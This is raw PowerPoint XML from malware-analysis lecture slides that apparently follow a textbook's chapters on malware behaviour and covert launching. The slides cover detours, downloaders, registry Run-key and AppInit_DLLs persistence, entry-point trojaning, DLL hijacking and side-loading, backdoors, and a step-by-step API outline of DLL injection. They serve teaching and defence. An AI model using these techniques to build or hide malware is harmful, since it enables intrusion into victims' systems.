              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Code runs no matter how the function is called</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can be used for both kernel and user functions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2464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Malware and detours</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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600" dirty="0" smtClean="0"/>
              <a:t>Commonly used to add malicious functions into existing binaries on disk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>Adds a new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.detour </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>section into PE structure and modifies import address table using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setdll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/>
              <a:t>tool in Detours library</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>Targets include authentication check, DRM checks, anti-virus code, file system scans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2127707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Downloaders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Retrieve additional pieces of malware from network to execute</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Often packaged with an exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In Windows, API call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>URLDownloadtoFileA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>(or BSD socket calls) to download payload</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Followed by call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WinExec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>execute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9074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 example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Modify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ZwDeviceIoControlFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> to hide ports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Listing 11-7, p. 248, Loc. 6237: Get pointer to code location of function to insert hook into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Table 11-2, p. 248, Loc. 6253: Define “hook byte” template (detour)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Copy address of hooking function into template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sz="2400" dirty="0" smtClean="0"/>
              <a:t>) into 0x10004011</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Listing 11-8, p. 249, Loc. 6272: Call to install hook bytes at 0x10004010 into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ZwDeviceIoControlFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> call</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Note: Hook bytes can be installed deep into function to avoid detection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926446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 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mechanisms, different names</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Stephanie Archibald, “Sierra Had A Little Lamb”, INFILTRATE 2017</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://vimeo.com/215195101</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Alternative OS X hooks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>NSCreateObjectFileImageFromMemory</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>NSLinkModule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https://www.cylance.com/en_us/blog/running-executables-on-macos-from-memory.html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Persistence mechanisms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Methods to ensure survival of malware on a system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Windows Registry persistence</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Trojaning</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DLL load-order hijacking, DLL side-loading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5657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registry persistence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key malware targets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HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\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CurrentVersion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\Run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> + dozens more related to startup process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>AppInit_DLLs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Loaded into every process that loads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User32.dll</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Stored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HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\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CurrentVersion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\Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Space delimited string of DLLs to load upon application invocation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230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registry persistence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Common key malware targets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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dirty="0" smtClean="0"/>
              <a:t>Hooking logged events (logon, logoff, startup, shutdown, lock screen)</a:t>
            </a:r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\HKLM\SOFTWARE\Microsoft\Windows NT\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CurrentVersion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Winlogon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lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>When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winlogon.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> generates an event, Windows checks the Notify registry key above for a DLL that will handle it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>SvcHost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> DLLs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>All services persist via registry</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2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svchost.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> – generic host process for services that run from DLLs</a:t>
            </a:r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\HKLM\SOFTWARE\Microsoft\Windows NT\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CurrentVersion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Svchost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\HKLM\System\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CurrentControlSet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\Services\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ServiceName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9529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Trojaning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Malware patches binary or library to add its functionality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Nimda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, Bliss</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Append code in existing section or in new section</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Change entry point to point to virus code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Virus returns to target program after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6079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12640" y="2451137"/>
            <a:ext cx="4741920" cy="341316"/>
          </a:xfrm>
          <a:prstGeom prst="rect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85120" y="1081554"/>
            <a:ext cx="5175860" cy="4517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typedef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struct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{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unsigned char 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e_ident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[EI_NIDENT];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e_type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e_machine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Elf32_Word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e_version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Elf32_Addr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e_entry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Elf32_Off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e_phoff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Elf32_Off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e_shoff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Elf32_Word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e_flags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e_ehsize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e_phentsize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e_phnum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e_shentsize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e_shnum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	Elf32_Half	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000066"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>e_shstrndx</a:t>
            </a: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;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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000066"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   } Elf32_Ehdr;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862880" y="3161133"/>
            <a:ext cx="4232160" cy="1286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342900" indent="-330200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>
                <a:solidFill>
                  <a:srgbClr val="280099"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“This member gives the virtual address to which the system first transfers control, thus starting the process”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="280099"/>
                </a:solidFill>
              </a:rPr>
              <a:t>We can change this to point elsewhere (not main() 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280099"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Trojaning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="280099"/>
                </a:solidFill>
              </a:rPr>
              <a:t> using the ELF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="280099"/>
                </a:solidFill>
              </a:rPr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93908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Trojaning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> DLLs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DllEntryPoint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> function tampering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Change code at entry to jump immediately to malicious code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Malicious code performs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>pusha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> to save all registers in one instruction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Malicious code performs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>popa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> to restore all registers before returning back to legitimate code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Example</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Table 11-1, Listing 11-5, p. 243, Loc. 6085</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Insert detour</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Invoke code to force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LoadLibrary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>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msconf32.dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Note: call followed by pop to get pointer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msconf32.dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Original instructions from entry point executed after </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>popa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> before jumping back to original code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8344396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Trojaning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> DLLs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DLL load-order hijacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>DLL search path in Windows XP (similar to LD_LIBRARY_PATH in Linux)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Directory from which application was loaded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Current directory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System directory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GetSystemDirectory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> function)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16-bit system directory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Windows directory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GetWindowsDirectory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> function)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-457200">
              <a:buSzPct val="90000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Directories in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PATH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> environment variable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Rename malicious library and place high in path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63804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8860479" cy="341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613" y="4699694"/>
            <a:ext cx="7838187" cy="192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Backdoor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Malware that provides attacker with remote access to victim machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Most common type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>of malware</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Commonly use outgoing port 80 (HTTP) to blend in with other traffic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Commonly implement </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>reverse shells (Equifax 2017)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Allow attacker to execute commands as if they were on local system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Examples: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netcat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cmd.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>remote access tools (a.k.a. RATs)</a:t>
            </a:r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140075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Trojaning DLLs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DLL side-loading</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>SxS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Windows feature for DLL versioning issues</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Allow multiple versions of DLL to exist in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>filesystem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> "side-by-side"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Choose the one used based on the version the application needs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Malware replaces version being used (which may not be visible in the file system)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Counter-measures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Application manifests with library integrity checks to validate DLL imports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63804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 11-1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32604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6481" y="596223"/>
            <a:ext cx="8226720" cy="114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932" y="857459"/>
            <a:ext cx="8410575" cy="623887"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Chapter 12: Covert Malware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Launching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5627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Covert Launching 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Launchers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Process Injection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Process Replacement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Hook Injection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Detours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APC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766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Launchers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Malware that sets itself up for immediate or future covert execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Often contain malware that is to be executed in a resource section</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>See previous Lab 11-01</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Uses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FindResource</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/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LoadResource</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>,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SizeofResource</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> API calls to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>extract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0332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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Process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Inject code into another running process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bypasses host-based firewalls and process-specific security mechanisms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Force process to call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VirtualAllocEx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, then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WriteProcessMemory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to inject code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Two injection types: DLL injection, direct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17095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DLL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Force remote process to load a malicious DLL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Most common covert loading technique</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Remotely inject code into process that calls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LoadLibrary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OS automatically executes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DllMain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> of newly loaded libraries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>All actions appear to originate from compromised process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Figure 12-1, p. 255, Loc. 6380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98788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880" y="1221248"/>
            <a:ext cx="8307360" cy="522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838080" y="3429001"/>
            <a:ext cx="8000640" cy="96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2900" b="1">
              <a:solidFill>
                <a:srgbClr val="000066"/>
              </a:solidFill>
            </a:endParaRP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endParaRPr lang="en-US" altLang="en-US" sz="2900" b="1">
              <a:solidFill>
                <a:srgbClr val="00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0113"/>
            <a:ext cx="8410575" cy="623887"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DLL injection into running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0967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DLL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Method #1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CreateToolhelp32Snapshot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Process32First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Process32Next</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> API calls to search process list for victim</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Get PID of victim and use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OpenProcess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> to obtain handle</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Allocate space for name of malicious DLL in victim process</a:t>
            </a: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VirtualAllocEx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> allocates space in remote process given handle</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Call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WriteProcessMemory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> to write string into victim process where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VirtualAllocEx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> obtained space</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Call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CreateRemoteThread</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> to start a new thread in victim</a:t>
            </a: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lpStartAddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> : starting address of thread (set to address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LoadLibrary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a: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lpParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> : argument for thread (point to above memory that stores name of malicious DLL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Listing 12-1, Figure 12-2, p. 255-256, Loc. 6403, 6423</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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6096000"/>
            <a:ext cx="7320678" cy="50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80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="363"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000066"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>J. Richter, “Load Your 32-bit DLL into Another Process’s </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="363"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000066"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Address Space Using INJLIB”, Microsoft Systems Journal/9 No. 5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="11985692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DLL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Preserving original functionality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Still need original functions to work correctly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Injected DLL often set up to call original DLL to support desired functionality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Interposed between application and real DLL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Example tool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Inject.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
